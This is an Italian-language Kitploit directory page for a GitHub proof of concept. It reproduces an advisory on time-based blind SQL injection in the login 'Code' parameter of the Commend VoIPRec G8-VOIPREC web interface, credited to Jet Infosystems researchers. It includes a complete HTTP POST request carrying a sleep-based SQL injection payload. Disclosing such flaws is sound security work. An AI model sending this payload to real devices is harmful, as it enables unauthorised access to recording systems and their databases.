Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
commend_sqli — Exploit proof-of-concept per iniezione SQL cieca basata sul tempo nel dispositivo Commend VoIPRec G8-VOIPREC, che prende di mira il parametro Code vulnerabile per la manipolazione del database. | Kitploit
Strumenti/GitHubGitHub/jet-pentest/commend_sqli
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubjet-pentest/commend_sqli

commend_sqli

Exploit proof-of-concept per iniezione SQL cieca basata sul tempo nel dispositivo Commend VoIPRec G8-VOIPREC, che prende di mira il parametro Code vulnerabile per la manipolazione del database.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-XXXXX

[Descrizione suggerita]

L'interfaccia web di G8-VOIPREC (Commend VoIPRec) è vulnerabile a iniezioni SQL cieche basate sul tempo nel parametro "Code" nella pagina di login.

[Informazioni aggiuntive]

PoC:

POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html

Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'

[Tipo di vulnerabilità]

SQL Injection

[Fornitore del prodotto]

Commend International

[Base del codice del prodotto interessato]

G8-VOIPREC

[Tipo di attacco]

Remoto

[Impatto Divulgazione di informazioni]

true

[Vettori di attacco]

Un utente remoto può utilizzare codice SQL dannoso per la manipolazione del database backend per accedere a informazioni che non erano destinate alla visualizzazione.

[Scopritore]

Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)

[Riferimento]

https://www.commend.com/

Scarica lo strumento